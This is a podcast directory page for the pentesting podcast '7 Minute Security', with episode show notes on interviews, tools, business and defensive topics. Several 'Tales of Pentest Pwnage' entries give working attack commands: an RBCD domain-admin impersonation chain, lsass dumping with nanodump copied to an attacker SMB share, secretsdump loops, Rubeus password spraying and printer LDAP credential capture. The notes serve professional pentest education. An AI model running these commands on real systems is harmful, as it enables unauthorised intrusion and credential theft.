7 Minute Security

Follow 7 Minute Security
Share on
Copy link to clipboard

7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

Brian Johnson


    • Dec 2, 2022 LATEST EPISODE
    • weekly NEW EPISODES
    • 24m AVG DURATION
    • 547 EPISODES

    4.7 from 62 ratings Listeners of 7 Minute Security that love the show mention: security topics, infosec, cyber security, brian, highly recommend listening, shares, short, news, tips, minutes, earth, experience, helpful, informative, great job, awesome, thanks, good, fun, show.



    More podcasts from Brian Johnson

    Search for episodes from 7 Minute Security with a specific topic:

    Latest episodes from 7 Minute Security

    7MS #549: Interview with Christopher Fielder and Daniel Thanos of Arctic Wolf

    Play Episode Listen Later Dec 2, 2022 61:45


    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Today my friends Christopher Fielder and Daniel Thanos from Arctic Wolf chat with me about what kinds of icky things bad guys/gals are doing to our networks, and how we can arm ourselves with actioanble threat intelligence and do something about it! P.S. This is Christopher's seventh time on the program. Be sure to check out his first, second, third, fourth, fifth and sixth interviews with 7MS.

    7MS #548: Tales of Pentest Pwnage - Part 44

    Play Episode Listen Later Nov 25, 2022 50:13


    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Happy belated Thanksgiving! This is not a brag or a flex, but this episode covers a coveted achievement I haven't achieved in my whole life...until now: TDAD: Triple Domain Admin Dance!!!!1111!!!1!1!!!! We talk about the fun attack path that led to the TDAD (hint: always check Active Directory user description fields!), as well as a couple quick, non-spoilery reviews of a few movies: V for Vendetta and The Black Phone.

    7MS #547: Tales of Pentest Pwnage - Part 43

    Play Episode Listen Later Nov 18, 2022 42:33


    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Today we're talking about tales of pentest pwnage - specifically how much fun printers can be to get Active Directory creds. TLDL: get into a printer interface, adjust the LDAP lookup IP to be your Kali box, run nc -lvp 389 on your Kali box, and then "test" the credentials via the printer interface in order to (potentially) capture an Active Directory cred! Today we also define an achievement that's fun to unlock called DDAD: Double Domain Admin Dance.

    7MS #546: Securing Your Mental Health - Part 3

    Play Episode Listen Later Nov 11, 2022 39:58


    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Today we're talking about securing your mental health! I share some behind-the-scenes info about my own mental health challenges, and share a great tip a counselor gave me for getting into a good headspace before heading into a difficult conversation/situation.

    7MS #545: First Impressions of Snipe-IT

    Play Episode Listen Later Nov 4, 2022 40:36


    Today's episode of the 7 Minute Security podcast is brought to you by Blumira, which provides easy-to-use automated detection and response that can be set up in…well..about 7 minutes. Detect and resolve security threats faster, and prevent breaches. Try it free today at blumira.com/7ms. Hey friends, today we're giving you a first impressions look at a free easy asset management tool called Snipe-IT you can use to build your inventory with! Why is this important? Because it's the first critical security control! It might help to see this tool in action, so we invite you to check out our recent Twitch stream where we got it up and running in about 45 minutes.

    7MS #544: Interview with Nato Riley of Blumira

    Play Episode Listen Later Oct 28, 2022 58:31


    Today's episode is brought to us by Blumira, which provides easy to use, automated detection and response that can be setup in…well…about 7 minutes! Detect and resolve security threats faster and prevent breaches. Try it free today at blumira.com/7ms! Today we have a really fun interview with Nato Riley of Blumira. He cut his IT/security teeth working for a cell phone company, exorcising malware demons out of workstations, and even building an email-based SIEM. He has had a very cool career path that involves embracing newbness, pushing aside imposter syndrome, and even begging for jobs! I think this interview can best be summed up by a direct quote from Nato: "Things absolutely go wrong, and I think that's what deters people from trying. But just because something goes wrong, doesn't mean you're necessarily going to die from it. So why not try?"

    7MS #543: How to Succeed in Business Without Really Crying - Part 12

    Play Episode Listen Later Oct 21, 2022 60:40


    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Hey friends! Today we talk about a SoSaaS (Spreadsheet on Steroids as a Service...not a real thing) that is helping 7MinSec be more organized - both from a project standpoint and from an "alert us when important things are due!" standpoint.

    7MS #542: Eating the Security Dog Food - Part 5

    Play Episode Listen Later Oct 14, 2022 28:47


    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. In today's episode we talk more about eating the security dog food (following the best practices we preach!). Specifically, we focus on keeping that bloated email inbox a little more lean and mean. There are lots of tools/services to help with this, but we had a blast playing with MailStore (not a sponsor but we'd like them to be:-).    

    7MS #541: Tales of Blue Team Bliss - Part 2

    Play Episode Listen Later Oct 7, 2022 35:43


    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit SafePass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Today we talk about configuring your Active Directory with MFA protection thanks to AuthLite. In the tangent department, we give you a short, non-spoilery review of the film Smile.

    7MS #540: Tales of Blue Team Bliss

    Play Episode Listen Later Sep 30, 2022 58:24


    Today we're excited to kick off a new series all about blue team bliss - in other words, we're talking about pentest stories where the blue team controls kicked our butt a little bit! Topics include: The ms-ds-machineaccount-quota value is not an "all or nothing" option! Check out Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Add workstations to domain. We installed LAPS on Twitch last week and it went pretty well! We'll do it again in an upcoming livestream. Defensive security tools that can interrupt the SharpHound collection! EDRs are pretty awesome at catching bad stuff - and going into full "shields up" mode when they're irritated!

    7MS #539: Eating the Security Dog Food - Part 4

    Play Episode Listen Later Sep 23, 2022 47:56


    Today we revisit a series we haven't touched in a long time all about eating the security dog food. TLDL about this series is I often find myself preaching security best practices, but don't always follow them as a consultancy. So today we talk about: How the internal 7MS infosec policy development is coming along Why I'm no longer going to be “product agnostic” going forward Some first impressions of a new tool I'm trying called ITGlue (not a sponsor) How to start building a critical asset list - and how it shouldn't overlook things like domain names and LetsEncrypt certs Also, don't forget we are doing weekly livestreams on security topics!

    7MS #538: First Impressions of Airlock Digital

    Play Episode Listen Later Sep 16, 2022 36:05


    Hey friends! Today we're giving you a first impressions episode all about Airlock Digital, an application allowlisting solution. They were kind enough to let us play with it in our lab with the intention of exploring its bells and whistles, so we're excited to report back our findings in podcast form. TLDL: we really like this solution! It is easy to deploy (see this YouTube video for a quick walkthrough). Once I had it going in the lab, I tried administering it without reading any of the documentation, and figured out most of the workflows with ease. I just ran into a couple questions that the Airlock folks were great about answering quickly. I want to better understand the "Microsoft way" to do application allowlisting - using their standard offering or something like AaronLocker. But several colleagues have told me they had "OMG moments" where a C-level staff member suddenly needed to run something like ringcentral.exe and they weren't able to because of app blocklisting. It then becomes difficult to quickly allow that .exe to run without pushing GPO updates or having someone log in as local admin or something like that. But Airlock has a cool, killer feature to address this need...take a listen to today's program to learn more!

    7MS #537: Tales of Pentest Pwnage - Part 42

    Play Episode Listen Later Sep 9, 2022 50:37


    In today's episode we share some tips we've picked up in the last few weeks of pentesting, with hopes it will save you from at least a few rounds of smashing your face into the keyboard. Tips include: If you find yourself with "owns" rights to a bajillion hosts in BloodHound, this query will give you a nice list of those systems, one system per line: cat export-from-bloodhound.json | jq '.nodes[].label' | tr -d '"' Then you can scan with nmap to find the "live" hosts: nmap -sn -iL targets.txt For resource based constrained delegation attacks, check out this episode of pwnage for some step-by-step instructions. If you have RBCD admin access to victim systems, don't forget that CrackMapExec support Kerberos! So you can do stuff like: cme smb VICTIM-SYSTEM -k --sam or cme smb VICTIM-SYSTEM -k -M wdigest -M ACTION=enable Take the time to search SMB shares with something like PowerHuntShares. If you have write access in places, drop an SCF file to capture/pass hashes! Looking to privilege escalate while RDP'd into a system? You owe it to yourself to check out KrbRelayUp! Ever find yourself with cracked hashcat passwords that look something like '$HEX[xxxx]'? Check this tweet from mpgn for a great cracking tip!

    7MS #536: Interview with Amanda Berlin of Blumira

    Play Episode Listen Later Sep 2, 2022 65:09


    Today we're so excited to welcome Amanda Berlin, Lead Incident Detection Engineer at Blumira, back to the show (did you miss Amanda's first appearance on the show?  Check it out here)!  You might already be familiar with Amanda's awesome Defensive Security Handbook or her work with the Mental Health Hackers organization.  Today we virtually sat down to tackle a variety of topics and questions, including: What if HAFNIUM2 comes out today and only affects 2 specific versions of Exchange?  Does Blumira buy every software/hardware thingy out there and have an evil scientist lab where they test out all these different exploits, and then create detections for them? Can an old, out-of-touch security guy like me still find a place at the Vegas hacker conferences (even though I hate lines, heat, crowds and partying)?  Spoiler alert: yes. Are security vendors more likely to share their software/hardware security services with a defensive security group like Blumira, rather than pentesters like 7MinSec? Does Amanda think there's a gender bias in the security industry? Besides being aware of it happening, what can we do to cut down the bullying/secure-splaining/d-baggery/etc. in the industry?

    7MS #535: Rage Against the Remediation

    Play Episode Listen Later Aug 27, 2022 40:49


    Today's episode covers three remediation-focused topics that kind of grind my gears and/or get me frustrated with myself. I'm curious for your thoughts on these, so reach out via Slack or Twitter and maybe we'll do a future live stream on this topic. How do you get clients to actually care when we explain the threats on their network that are a literal 10/10 on the CVSS scale? Password policies - they're not just as easy as "Have a password of X length with Y complexity." Fixing the various broadcast traffic and protocol issues that give us easy wins with Responder and mitm6 - it's more nuanced than just "Disable LLMNR/NETBIOS/MDNS and shut off IPv6." This article discusses these challenges in more detail.

    7MS #534: Tales of Pentest Pwnage - Part 41

    Play Episode Listen Later Aug 19, 2022 44:51


    Hey friends, today we share the (hopefully) thrilling conclusion of last week's pentest. Here are some key points: If you find you have local admin on a bunch of privileges and want to quickly loop through a secretsdump of ALL systems and save the output to a text file, this little hacky script will do it! #!/bin/bash File="localadmin.txt" Lines=$(cat $File) for Line in $Lines do echo --- $Line --- >> dump.txt echo --------------------- >> dump.txt sudo python3 /opt/impacket/examples/secretsdump.py -k "$Line" >> dump.txt echo --------------------- >> dump.txt done From those dumps you can definitely try to crack the DCC hashes using a local or cloud cracker - see our series on this topic for some guidance. Got an NTLM hash for a privileged user and want to PS remote into a victim system? You can essentially do a PowerShell login pass-the-hash with evil-winrm! The Brute Ratel crisis monitor is awesome for watching a box and monitoring for people logging in and out of it (perfect for getting ready to strike with lsass dumps!)

    7MS #533: Tales of Pentest Pwnage - Part 40

    Play Episode Listen Later Aug 12, 2022 35:06


    Ok, ok, I know.  I almost always say something like "Today is my favorite tale of pentest pwnage."  And guess what?  Today is my favorite tale of pentest pwnage, and I don't even know how it's going to end yet, so stay tuned to next week's (hopefully) exciting conclusion.  For today, though, I've got some pentest tips to hopefully help you in your journeys of pwnage: PowerHuntShares is awesome at finding SMB shares and where you have read/write permissions on them.  Note there is a -Threads flag to adjust the intensity of your scan. Are your mitm6 attacks not working properly - even though they look like they should?  There might be seem LDAP/LDAPs protections in play.  Use LdapRelayScan to verify! Are you trying to abuse Active Directory Certificate Services attack ESC1 but things just don't seem to be working?  Make sure the cert you are forging is properly representing the user you are trying to spoof by using Get-LdapCurrentUser.ps1.  Also look at PassTheCert as another tool to abuse ADCS vulnerabilities. Example syntax for LdapCurrentUser: Get-LdapCurrentUser -certificate my.pfx -server my.domain.controller:636 -usessl -CertificatePassword admin If you manage to get your hands on an old Active Directory backup, this PowerShell snippet will help you get a list of users from the current domain, sorted by passwordlastset.  That way you can quickly find users who haven't changed their password since the AD backup: get-aduser -filter * -server victimdomain.local -properties pwdlastset,passwordlastset,enabled | where { $_.Enabled -eq $True} | select-object samaccountname,passwordlastset | sort-object passwordlastset

    7MS #532: Tales of Pentest Pwnage - Part 39

    Play Episode Listen Later Aug 5, 2022 54:39


    Hey friends, wow...we're up to thirty-nine episodes of pwnage? Should we make a cake when we hit the big 4-0?! Anyway, today's TLDL is this: If you get a nagging suspicion about something you find during enumeration, make sure to either come back to it later, or exhaust the path right away so you don't miss something! Because I did :-/ A tip that's been helping me speed along my use of CrackMapExec and other tools is by using Kerberos authentication. You can grab a ticket for your test AD account by using Impacket like so: gettgt.py victim.domain/LowPrivUser export KRB5CCNAME=LowPrivUser.ccache Then in most tools you can pass the cred by doing something like: crackmapexec smb DC01 -k In my enumeration of this network, I used Certipy to find potential attack paths against Active Directory Certificate Services. Something cool I learned is that Certipy will spit out both a text and json dump so you can import into BloodHound and then pair that data with their custom queries json file for beautiful visual potential pwnage! I ran into an issue where my certificate shenanigans resulted in an KDC_ERR_PADATA_TYPE_NOSUPP. I originally gave up on this attack path, only to learn about this awesome PassTheCert tool from this rad blog post! After initially being hesitant to use a tool I'd never heard of, I raised a GitHub issue to calm my nerves and, shortly after, found myself doing a domain admin dance. Oh, and although I didn't use it on this specific pentest, coercer is an awesome tool that helps you, ya know, coerce things!

    7MS #531: Interview with Christopher Fielder and Eugene Grant of Arctic Wolf

    Play Episode Listen Later Aug 1, 2022 57:27


    Today we're joined by some of our friends at Arctic Wolf - Eugene Grant and Christopher Fielder - to talk about compliance. Now hold on - don't leave yet! I know for many folks, compliance makes them want to bleach their eyeballs. But compliance is super important - especially because it is not the same as being secure. So we discuss the differences between security and compliance, and practical work we can do to actually be more compliant and secure, including: Knowing what you have (assets, installed software, etc.) - Rumble is a cheap/free way to find out! Creating core policies and procedures that you will actually follow Learning about security frameworks that will help you build a security program from scratch Preparing for your first (or next) pentest. Tools like PingCastle and BloodHound can help find hacker low-hanging fruit! Knowing where your crown jewels are - be that data, a database, a key system, etc. Writing critical documentation - especially backup/restore procedures. Forming a security "dream team" to help drive your program Asking the right security maturity questions at your next job interview (so you don't get hired into a dumpster fire!) P.S. this is Christopher's sixth time on the program. Be sure to check out his first, second, third, fourth and fifth interviews with 7MS.

    7MS #530: Tales of Pentest Pwnage - Part 38

    Play Episode Listen Later Jul 22, 2022 47:53


    Hey friends, we have another fun tale of pwnage for you today. I loved this one because I got to learn some new tools I hadn't used before, such as: Get-InternalSubnets.ps1 - for getting internal subnets Adalanche for grabbing Active Directory info (similar to SharpHound) This tool worked well for me with this syntax: adalanche-windows-x64-v2022.5.19.exe collect activedirectory --domain victim.domain --port=389 --tlsmode=NoTLS Copernic Desktop Search for pillaging through shares with Google-like search capabilities! PowerHuntShares is my new favorite tool for enumerating network shares and associated permissions! CeWL for creating awesome wordlists to crack with! I don't have a Toyota TRD Pro, but I can't stop watching this reel.  

    7MS #529: Interview with Matthew Warner of Blumira

    Play Episode Listen Later Jul 15, 2022 73:54


    Today we're featuring a great interview with Matthew Warner, CTO and co-founder of Blumira. You might remember Matt from such podcasts as this one) when Matt gave us a fountain of info on why out-of-the-box Windows logging isn't awesome, and how to get it turned up to 11! Today, we talk about a cool report that Blumira put out called 2022 Blumira's State of Detection & Response, and dive into some interesting topics within it, including: How do companies like Blumira (who we rely on to stay on top of threats) keep their teams on top of threats? Why open source detections are a great starting point - but not a magic bullet Consider this "what if" - a C2 beacon lands on your prod file server in the middle of the work day. Do you take it down during a busy time to save/clean the box as much as possible? Or do you hope to be able to wait until the weekend and triage it on a weekend? Why annoying traffic/alerts are still worth having a conversation about. For example, if you RDP out of your environment and into Azure, that might be fine. But what about when you see an RDP connection going out to a Digital Ocean droplet? Should you care? Well, do you use Digital Ocean for legit biz purposes? Data exfiltration - where does it sit on your priority list? How hard is it to monitor/block? Common lateral movement tools/techniques Why honeypots rule!

    7MS #528: Securing Your Family During and After a Disaster - Part 6

    Play Episode Listen Later Jul 8, 2022 40:58


    In today's episode, I try to get us thinking about our extended family's emergency/DR plan. Why? Because I recently had a close family member suffer a health scare, and it brought to light some questions we didn't have all the answers for: Do we have creds to log onto his computer? How about his email accounts? Do we have usernames/passwords for retirement accounts, bank accounts, etc.? For vehicles/ATVs/boats/etc. - do we have documentation about their service records? How about titles? Can we get into his phone to get key info off of text messages and grab phone #s of key contacts? What are his wishes if he were to pass? Do not resuscitate? How is the money getting handled? Cremation vs. burial? Do we have redundancy in this plan, or is it all on paper in a file somewhere?

    7MS #527: First Impressions of Purple Knight

    Play Episode Listen Later Jul 1, 2022 52:49


    In today's episode we talk about Purple Knight, a free tool to help assess your organization's Active Directory security. I stuck Purple Knight in our Light Pentest LITE pentest training lab and did an informal compare-and-contrast of its detection capabilities versus PingCastle, which we talked about in depth in episode #489. 

    7MS #526: Tales of Pentest Pwnage - Part 37

    Play Episode Listen Later Jun 24, 2022 34:40


    Today's another fun tale of pentest pwnage - specifically focused on cracking a hash type I'd never paid much attention to before: cached domain credentials. I also learned that you can at least partially protect against this type of hash being captured by checking out this article, which has you set the following setting in GPO: Under Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options set Interactive logon: Number of previous logons to cache to 0. Be careful, as you will have login problems if a domain controller is not immediately accessible! In regards to defending against secretsdump, this article I found this article to be super interesting.

    7MS #525: First Impressions of InsightIDR - Part 2

    Play Episode Listen Later Jun 17, 2022 33:25


    Today we're sharing an updates to episode #512 where we ran Rapid7's InsightIDR through a bunch of attacks: Active Directory enumeration via SharpHound Password spraying through Rubeus Kerberoasting and ASREPRoasting via Rubeus Network protocol poisoning with Inveigh. Looking for a free way to detect protocol poisoning? Check out CanaryPi. Hash dumping using Impacket. I also talk about an interesting Twitter thread that discusses the detection of hash dumping. Pass-the-hash attacks with CrackMapExec In today's episode I share some emails and conversations we had with Rapid7 about these tests and their results. I'm also thrilled to share with you the articles themselves: Getting Started with Rapid7 InsightIDR: A SIEM Tutorial Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR

    7MS #524: How to Update VMWare ESXi From the Command Line

    Play Episode Listen Later Jun 10, 2022 33:52


    I'm extra psyched today, because today's episode (which is all about updating your VMWare ESXi version via command line) is complemented by video: https://www.youtube.com/watch?v=0-XAO32LEPY Shortly after recording this video, I found this awesome article which walks you through a different way to tackle these updates: List all upgrade profiles: esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml Grep for just the ones you want (in my case ESXi 7.x): esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0 Apply the one you want! esxcli software sources profile list --depot=https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml | grep -i ESXi-7.0    

    7MS #523: Local Administrartor Password Solution - RELOADED!

    Play Episode Listen Later Jun 3, 2022 38:18


    Well friends, it has been a while since we talked about Microsoft's awesome Local Administrator Password Solution - specifically, the last time was way back in 2017! Lately I've been training some companies on how to install it by giving them a live walkthrough in our Light Pentest LITE lab, so I thought it would be a good time to write up a refreshed, down and dirty install guide. Here we go! (See the show notes for today's episode for more details!)

    7MS #522: Pwning Wifi PSKs and PMKIDs with Bettercap - Part 2

    Play Episode Listen Later May 27, 2022 35:23


    Hey friends, a while back in episode #505 we talked about pwning wifi PSKs and PMKIDs with Bettercap. Today I'm revisiting that with even some more fun command line kung fu to help you zero in on just the networks you're interested in and filter out a bunch of noisy events from bettercap in the process.

    7MS #521: Tales of Pentest Pwnage - Part 36

    Play Episode Listen Later May 20, 2022 57:18


    Hey friends! Today's another swell tale of pentest pwnage, and it's probably my favorite one yet (again)! This tale involves resource based constrained delegation, which is just jolly good evil fun! Here are my quick notes for pwning things using RBCD: # From non-domain joined machine, get a cmd.exe running in the context of a user with ownership rights over a victim system: runas /netonly /user:domainsome.user cmd.exe # Make new machine account: New-MachineAccount -MachineAccount EVIL7MS -Password $(ConvertTo-SecureString 'Muah-hah-hah!' -AsPlainText -Force) -Verbose # Get the SID: $ComputerSid = Get-DomainComputer -Identity EVIL7MS -Properties objectsid | Select -Expand objectsid # Create raw descriptor for fake computer principal: $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) # Apply descriptor to victim machine: Get-DomainComputer SERVER-I-WANT-2-PWN | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose # Get a service ticket for the EVIL7MS box and impersonate a domain admin ("badmin") on the SERVER-I-WANT-2-PWN box: getst.py -spn cifs/SERVER-I-WANT-2-PWN -impersonate badmin -dc-ip 1.2.3.4 domain.com/EVIL7MS$:Muah-hah-hah! # Set the ticket export KRB5CCNAME=badmin.ccache # Dump victim server's secrets! secretsdump.py -debug k SERVER-I_WANT-2-PWN Also, on the relaying front, I found this blog from TrustedSec as well as this article from LummelSec to be amazing resources. Looking for an affordable resource to help you in your pentesting efforts? Check out our Light Pentest LITE: ebook Edition!

    7MS #520: How to Succeed in Business Without Really Crying - Part 11

    Play Episode Listen Later May 13, 2022 48:26


    Hey friends, today we're giving another peek behind the curtain of what it's like to run a cybersecurity consultancy. Topics include: Setting the right communication cadence - and communication channels - with a customer during a pentest. Tips for collaborating well with contractors so that the customer experience feels like "a single human pane of glass" (insert barf emoji here). How we're using Intercom to publish self-help/FAQ articles for 7MS.

    7MS #519: Tales of Pentest Pwnage - Part 35

    Play Episode Listen Later May 7, 2022 46:36


    Hey friends, it's another fun tale of pentest pwnage today! This one talks about cool things you can do when you have full rights over an OU in Active Directory. Important links to review: BloodHound edges DACL Trouble: Generic All on OUs AD prep bug in Windows Server 2016

    7MS #518: Interview with Amanda Berlin of Blumira

    Play Episode Listen Later Apr 27, 2022 57:42


    Today we're pumped to share a featured interview with Amanda Berlin, Lead Incident Detection Engineer at Blumira. You might already be familiar with Amanda's awesome Defensive Security Handbook or fine work with Mental Health Hackers. We polled our Slack friends and structured this interview as an AAA (Ask Amanda Anything). That resulted in a really fun chat that covered many things technical and not technical! Questions we posed to Amanda include: Can you tell us more about your infosec superhero origin story and creation of your book? Will there ever be a new version of the Defensive Security Handbook? What blue team certs/YouTube vids/classes/conferences give the best bang for your buck? Was it a mistake to invent computers? From a logging standpoint, what devices provide blind spots (Linux systems, ioT devices, etc.)? You can wave a magic wand and solve any three security challenges instantly - what do you choose? Infosec Twitter drama. Love it? Leave it? Something inbetween? Tips to prevent business email compromise? How do we keep beloved family/friends (who keep falling prey to social engineering campaigns) safer on their computers and on the Web? Our company had a partial ransomware deployment a few years ago. Is changing Active Directory passwords changed and formatting affected systems enough? (Spoiler alert: no. See Microsoft's advice on the topic)

    7MS #517: DIY Pentest Dropbox Tips - Part 6

    Play Episode Listen Later Apr 22, 2022 46:51


    Today we're continuing a series we haven't done in a while (click here to see the whole series) all about building and deploying pentest dropboxes for customers. Specifically, we cover: Auto installing Splashtop This can be done automatically by downloading your splashtop.exe install and issuing this command: splashtop.exe prevercheck /s /i confirm_d=0,hidewindow=1,notray=0,req_perm=0,sec_opt=2 Auto installing Ninite This can be done in a batch script like so: agent.msi /quiet ninitepro.exe /select App1 App2 App3 /silent ninite-install-report.txt The above command installs App1, App2 and App3 silently and logs output to a file called ninite-install-report.txt Auto installing Uptimerobot monitoring We do this by first creating a script called c:uptimerobot.ps1 that makes the "phone home" call to UptimeRobot: Start-Transcript -Path c:heartbeat.log -Append Invoke-Webrequest https://heartbeat.uptimerobot.com/LONG-UNIQUE-STRING -UseBasicParsing Stop-Transcript Then we install the scheduled task itself like so: schtasks.exe /create /tn "Heartbeat" /tr "powershell -noprofile -executionpolicy bypass -file c:uptimerobot.ps1" /rl highest /f /sc minute /mo 5 /ru "NT AUTHORITYSYSTEM"

    7MS #516: Tips to Travel More Securely

    Play Episode Listen Later Apr 14, 2022 45:46


    In today's episode I talk about a cool self-defense class I took a while ago which was all about less lethal methods of protecting/defending yourself. I also talk about some safer ways to handle/hide cash while traveling on vacation.

    7MS #515: Securing Your Family During and After a Disaster - Part 5

    Play Episode Listen Later Apr 6, 2022 35:02


    Today we continue the series we started a few years ago called Security Your Family During and After a Disaster (the last part in this series was from a few years ago. In today's episode we focus on some additional things you should be thinking about to strengthen the "in case of emergency" document you share with your close friends and family.

    7MS #514: Tales of Pentest Pwnage - Part 34

    Play Episode Listen Later Mar 30, 2022 50:07


    Welcome to another fun tale of pentest pwnage! This one isn't a telling of one single pentest, but a collection of helpful tips and tricks I've been using on a bunch of different tests lately. These tips include: I'm seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like: nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile Using mitm6 in "sniper" mode by targeting just one host with: mitm6 victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqnd Using secretsdump to target a single host: secretsdump.py -target-ip 1.2.3.4 localadmin:@1.2.3.4 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO. Note the colon after localadmin - it's intentional, NOT an error! Rubeus makes password spraying easy-peasy! Rubeus.exe spray /password:Winter2022 /outfile:output.txt. Get some hits from that effort? Then spray the good password against ALL domain accounts and you might get even more gold! LDAPs relaying not working? Make sure it's config'd right: nmap -p636 -sV -iL txt-file-with-dcs-in-it

    7MS #513: Interview with Christopher Fielder and Jon Crotty of Arctic Wolf

    Play Episode Listen Later Mar 23, 2022 55:22


    Today we're joined by our friends Christopher Fielder and Jon Crotty from Arctic Wolf to talk about their interesting report on The State of Cybersecurity: 2022 Trends (note: you can get some of the report's key points here without needing to provide an email address). The three of us dig in to talk about some of the report's specific highlights, including: Many orgs are running the bare minimum (or nothing!) for endpoint protection Cyber insurance costs are going up, and some customers are unable to afford it - or they're getting dropped by their carrier altogether Security is still not getting a seat at the decision-making table in a lot of orgs, and already-overburned IT teams taking on security as part of their job descriptions as well Seems like everybody and their mom is moving infrastructure to the cloud, but few are managing that attack surface, thus increasing risk The cyber skills gap remains a challenge - many security gurus are looking to get out of their current position, leading many orgs to hire inexperienced teams who make rushed/misinformed decisions about security tools and services, thus making the org less secure P.S. this is Christopher's fifth time on the program. Be sure to check out his first, second, third and fourth interviews with 7MS.

    7MS #512: First Impressions of InsightIDR

    Play Episode Listen Later Mar 17, 2022 51:23


    Today I'm sharing some first impressions of the Rapid 7 InsightIDR as kind of a teaser for an eventual new chapter in our Desperately Seeking a Super SIEM for SMBs series. Disclaimer: remember these are first impressions. There may be some missed detections I talk about today that are a me problem and not the technology. I hope to get to the root of those unresolved issues by the time I talk more formally about InsightIDR in a future episode. Enjoy!

    7MS #511: How to Succeed in Business Without Really Crying - Part 10

    Play Episode Listen Later Mar 11, 2022 36:48


    Today we're continuing our series focused on [owning a security consultancy], talking specifically about: How not to give up on warm sales leads, even if they haven't panned out for 5+ years! Some cool Mac tools that help me manage 7MS - such as Craft and OmniFocus A sneak peek at a SIEM vendor that will soon be featured in an episode of Desperately Seeking a Super SIEM for SMBs  

    7MS #510: First Impressions of Tailscale

    Play Episode Listen Later Mar 2, 2022 42:29


    Today we share some first impressions of Tailscale, a service that advertises itself as "Zero config VPN. Installs on any device in minutes, manages firewall rules for you, and works from anywhere." Is it really that cool and easy? Listen to today's episode to find out!

    7MS #509: Creating Kick-Butt Credential-Capturing Phishing Campaigns - Part 4

    Play Episode Listen Later Feb 23, 2022 34:55


    Today we revisit our phishing series with a few important updates that help us run our campaigns more smoothly, such as creating a simple but effective fake O365 portal, and being aware that some email systems may "pre-click" malicious links before users ever actually do.

    7MS #508: Tales of Pentest Pwnage - Part 33

    Play Episode Listen Later Feb 18, 2022 46:33


    Hey friends! We have another fun test of pentest pwnage to share with you today, which is kind of tossed in a blender with some first impressions of ShellcodePack. We were on a bunch of pentests recently where we needed to dump credentials out of memory. We usually skim this article and other dumping techniques, but this time nothing seemed to work. After some discussion with colleagues, we were pointed to nanodump, which I believe is intended for use with Cobalt Strike, but you can compile standalone (or, pro tip: the latest CrackMapExec has nanodump.exe built right into it, you just have to create the folder first. So what I like to do is put nanodump in a folder on my Kali box, get some admin creds to my victim host, and then do something like this: # Windows system: tell your Windows system to trust the victim host you're about to PS into: winrm set winrm/config/client @{TrustedHosts="VICTIM-SERVER"} # Windows system: PowerShell into the victim system Enter-PSSession -computername -Credential domain.compwneduser # Kali system: create and share a folder with nanodump.exe in it: sudo mkdir /share sudo python3 /opt/impacket/examples/smbserver.py share /share -smb2support # Victim system: copy nanodump from Kali box to VICTIM-SERVER copy \YOUR.KALI.IP.ADDRESSsharenano.exe c:windowstemp # Victim system: get the PID for lsass.exe tasklist /FI "IMAGENAME eq lsass.exe" # Victim system: use nano to do the lsass dump c:windowstempnano.exe --pid x --write c:windowstemptoteslegit.log # Victim system: Get the log back to your Kali share copy c:windowstemptoteslegit.log \YOUR.KALI.IP.ADDRSSshare # Kali system: "fix" the dump and extract credz with mimikatz! sudo /opt/nanodump/restore_signature.sh winupdates1.log sudo python3 -m pypykatz lsa minidump toteslegit.log -o dump.txt Enjoy delicious passwords and hashes in the dump.txt file!

    Claim 7 Minute Security

    In order to claim this podcast we'll send an email to with a verification link. Simply click the link and you will be able to edit tags, request a refresh, and other features to take control of your podcast page!

    Claim Cancel